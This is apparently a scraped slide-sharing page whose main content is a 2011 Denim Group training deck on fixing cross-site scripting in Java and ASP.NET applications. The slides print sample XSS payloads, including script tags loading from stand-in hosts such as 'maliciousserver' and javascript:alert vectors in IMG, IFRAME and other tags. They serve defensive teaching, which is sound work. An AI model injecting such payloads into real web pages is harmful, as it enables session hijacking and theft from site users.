A New View of Your Application Security Program with Snyk and ThreadFixA New View of Your Application Security Program with Snyk and ThreadFix
A New View of Your Application Security Program with Snyk and ThreadFix
 
Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...
 
AppSec in a World of Digital Transformation
AppSec in a World of Digital TransformationAppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
 
Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...
 
AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
 
Enumerating Enterprise Attack Surface
Enumerating Enterprise Attack SurfaceEnumerating Enterprise Attack Surface
Enumerating Enterprise Attack Surface
 

Kürzlich hochgeladen

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 

Kürzlich hochgeladen (20)

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 

XSS Remediation

  • 1. Cross-Site Scripting (XSS) Remediation Guerilla Training Camp Security BSides Austin Dan Cornell © Copyright 2011 Denim Group - All Rights Reserved
  • 2. My Background • Dan Cornell, founder and CTO of Denim Group • Software developer by background (Java, .NET, etc) • OWASP San Antonio, Global Membership Committee • Denim Group – Build software with special security, performance, reliability requirements – Help organizations deal with the risk associated with their software • Code reviews and application assessments • SDLC consulting • Secure development training – instructor-led and eLearning © Copyright 2011 Denim Group - All Rights Reserved 1
  • 3. Agenda • What is Cross-Site Scripting (XSS)? • How Do You Remediate XSS Vulnerabilities? • Questions © Copyright 2011 Denim Group - All Rights Reserved 2
  • 4. Vulnerability: Cross-Site Scripting #2 in the OWASP Top 10 If an attacker controls your browser – it is no longer your browser © Copyright 2011 Denim Group - All Rights Reserved 3
  • 5. Let's look at a simple application Web Application Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker © Copyright 2011 Denim Group - All Rights Reserved 4
  • 6. A standard user can update the name and email address on their profile: NormalGuy normalguy@normalmail.com An administrative user can retrieve this information, shown in a page: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value="normalguy@normalmail.com"> © Copyright 2011 Denim Group - All Rights Reserved 5
  • 7. With normal input <input type=”text” name=”name” value=”NormalGuy”><br> <input type=”text” name=”email” value=” normalguy@normalmail.com”> Web Browser Administrative Pages Administrator Database Web Browser User Pages NormalGuy User normalguy@normalmail.com © Copyright 2011 Denim Group - All Rights Reserved 6
  • 8. A malicious user can inject malicious scripts into their profile: MaliciousGuy "><script src="http://maliciousserver/rewritepage.js" /> When the administrative user retrieves this information: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value=" "><script src="http://maliciousserver/rewritepage.js" />"> © Copyright 2011 Denim Group - All Rights Reserved 7
  • 9. With malicious input <input type=”text” name=”name” value=”MaliciousGuy”><br> <input type=”text” name=”email” value=””><script src=”http://maliciousserver/rewritepage.js” />”> Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker MaliciousGuy ”><script src=”http://maliciousserver/rewritepage.js” /> © Copyright 2011 Denim Group - All Rights Reserved 8
  • 10. What is Cross-Site Scripting? • Occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • Victim's browser renders HTML and executes JavaScript chosen by the Attacker • Not a direct attack on the application – it is attack on users of the application – Exploitation can involve many scenarios including social engineering • Most common web application security issue – Based on MITRE statistics © Copyright 2011 Denim Group - All Rights Reserved 9
  • 11. Impact of Cross-Site Scripting What can an attacker accomplish with a malicious script? © Copyright 2011 Denim Group - All Rights Reserved 10
  • 12. Cross-Site Scripting Attacks • Attackers may have different means to have their code to execute on another user’s browser • Reflected • Stored • DOM Based © Copyright 2011 Denim Group - All Rights Reserved 11
  • 13. Reflected Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Web application reflects the payload back to the victim's browser where it is rendered and executed • Commonly found in – Login pages – Message pages © Copyright 2011 Denim Group - All Rights Reserved 12
  • 14. Reflected Cross-Site Scripting Malicious Web Attacker User Web Application Server Send e-mail to user with link Link makes request to website Response includes malicious content Malicious content sends authentication information to attacker’s resources or Malicious content redirects user to malicious website © Copyright 2011 Denim Group - All Rights Reserved 13
  • 15. Stored Cross-Site Scripting • Attacker posts payload to a database or other data store • Victim uses the same site and visits a page where the payload is sent back to the victim • The payload is rendered and executed in the browser • Commonly found in – Message boards (horizontal privilege escalation) – User management systems (vertical privilege escalation) © Copyright 2011 Denim Group - All Rights Reserved 14
  • 16. Stored Cross-Site Scripting Attacker Web Application User Submit field with malicious content Request for content to approve Reply containing malicious content © Copyright 2011 Denim Group - All Rights Reserved 15
  • 17. DOM-based Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Client-side code parses user-supplied data to make decisions • Things to look for – document.URL – document.URLUnencoded – document.location (and its other properties) – Document.referrer – window.location (and its other properties) © Copyright 2011 Denim Group - All Rights Reserved 16
  • 18. Crafting XSS Payloads • Most basic, if payload is echoed directly into open HTML – <script>alert('hi');</script> • Sometimes you may have to deal with application HTML – <input name='uname' value='<%= Request["uname"] %>' /> – uname parameter must: • Close out the value attribute: '> • Then include the payload: <script>alert('hi');</script> • Then clean up before the application HTML starts again: <' • Full payload: '><script>alert('hi');</script><' © Copyright 2011 Denim Group - All Rights Reserved 17
  • 19. Crafting XSS Payloads Script with the 'src' attribute <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT> An attacker is likely to use the 'src' attribute if the script requires more space than the application accommodates. Image <IMG SRC="javascript:alert('XSS');"> Body <BODY BACKGROUND="javascript:alert('XSS')"> © Copyright 2011 Denim Group - All Rights Reserved 18
  • 20. Crafting XSS Payloads Input <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> Iframe <IFRAME SRC="javascript:alert('XSS');"></IFRAME> In addition, the iframe can point to a malicious page on a remote host. Table <TABLE BACKGROUND="javascript:alert('XSS')"> Div <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> © Copyright 2011 Denim Group - All Rights Reserved 19
  • 21. Impact • Attacker can render HTML and execute script in the victim's browser, resulting in: – Session hijacking (adding JavaScript that forwards cookies to an attacker) – Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page) – Defacing web site (adding "This company is terrible!!!" to a page) – Inserting hostile content (adding malicious ActiveX controls to a page) – Phishing attacks (adding login FORM posts to 3rd party sites) – Takeover of the user's browser (adding JavaScript code to redirect the user) © Copyright 2011 Denim Group - All Rights Reserved 20
  • 22. Mitigation • Positively validate inputs – Length, type, syntax, business rules • Encode application outputs – HTML or XML – < becomes &lt; and so on © Copyright 2011 Denim Group - All Rights Reserved 21
  • 23. Java-specific Safeguards • Avoid using <%= %> because that does not encode outputs • Escape special HTML characters – < > ' " / & and so on… • Use URLEncoder class to encode characters being placed in a URL • Use Struts output mechanisms such as <bean:write …> • User JSTL escapeXML="true" attribute in <c:out …> • Use ESAPI Encoders © Copyright 2011 Denim Group - All Rights Reserved 22
  • 24. .NET-specific Safeguards • .NET has built-in blacklist validation against many known XSS attacks – This is good, but not ideal – This can be turned off with ValidateRequest="false" in the Page tag (BAD!) • Validation framework offers many protection options – RegExValidator and others • Avoid using <%= %> because that does not encode outputs – Look at <%: %> syntax in ASP.NET 4 – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html- encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx • Better: Use HttpUtility.HtmlEncode() to encode user-supplied data that is reflected back to users • Best: Microsoft Web Protection Library (WPL) – http://wpl.codeplex.com/ © Copyright 2011 Denim Group - All Rights Reserved 23
  • 25. Cross-Site Scripting Recap • Cross-Site Scripting (XSS) occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • There are three main varieties: – Stored – Reflected – DOM-based • To guard against: – Positively validate inputs – Escape user-supplied data sent back to the browser © Copyright 2011 Denim Group - All Rights Reserved 24
  • 26. OWASP ESAPI • Sites: – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE • Good: Provides very robust set of encoder functions • Less good: – Has a number of dependencies (~29) (currently – work on modularity is in progress) – Implementations are of varying maturity. Most useful for Java. © Copyright 2011 Denim Group - All Rights Reserved 25
  • 27. OWASP ESAPI (Java) • To Use: – Follow the installation guide – Must create a folder (.esapi) to store your configuration and preferences • Get access to library: – Add all the support jars (31) to your project – Remove repeated jars – Add esapi-2.0_rc10.jar to your project <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %> • Make calls to encode tainted data: – ESAPI.encoder().encodeForHTML() – ESAPI.encoder().encodeForHTMLAttribute() © Copyright 2011 Denim Group - All Rights Reserved 26
  • 28. ASP.NET Request Validation • ASP.NET provides some blacklist-based input validation to try and guard against HTML injection and cross-site scripting (XSS) attacks • This is turned on by default (yeah!) • Many applications disable it (boo!) – Blocked a valid request – Made trouble with AJAX – And so on © Copyright 2011 Denim Group - All Rights Reserved 27
  • 29. ASP.NET Request Validation • How to configure or check if it is enabled? • This is turned on by default • In web.config: <configuration> <system.web> <pages validateRequest=“true|false" /> </system.web> </configuration> • Per-page: <%@ Page … ValidateRequest=“true|false" %> © Copyright 2011 Denim Group - All Rights Reserved 28
  • 30. Microsoft Web Protection Library • Main site: – http://wpl.codeplex.com/ • To use: – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll) • Found in C:Program Files (x86)Microsoft Information SecurityAntiXSS Library v4.0 – Get access to library: • In code: – using Microsoft.Security.Application; • In ASPX page: – <%@ Import Namespace="Microsoft.Security.Application" %> – Make call to encode tainted data: • AntiXss.HtmlEncode() • AntiXss.HtmlAttributeEncode() • And so on… © Copyright 2011 Denim Group - All Rights Reserved 29
  • 31. Exercise: Fixing XSS Vulnerabilities • Java – Reflected XSS – Stored XSS • ASP.NET – Reflected XSS – Stored XSS © Copyright 2011 Denim Group - All Rights Reserved 30
  • 32. But Your ASP.NET Examples Cheated! • This is true: ASP.NET provides some XSS protection via the ValidateRequest functionality • However: – This can be (and is often) turned off on a per-page or site-wide basis – It has been defeated in the past and will be defeated again in the future • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/byp assing-dot-NET-ValidateRequest.pdf • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava- FavoriteXSS-SLIDES.pdf • If you want your code to be “Rugged” then you need to actually guard against cross-site scripting vulnerabilities in your code © Copyright 2011 Denim Group - All Rights Reserved 31
  • 33. Resources • OWASP ESAPI – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API • Microsoft Web Protection Library – http://wpl.codeplex.com/ • Denim Group Remediation Resource Center – www.denimgroup.com/remediation © Copyright 2011 Denim Group - All Rights Reserved 32
  • 34. Questions? Dan Cornell dan@denimgroup.com Twitter: @danielcornell www.denimgroup.com (210) 572-4400 © Copyright 2011 Denim Group - All Rights Reserved 33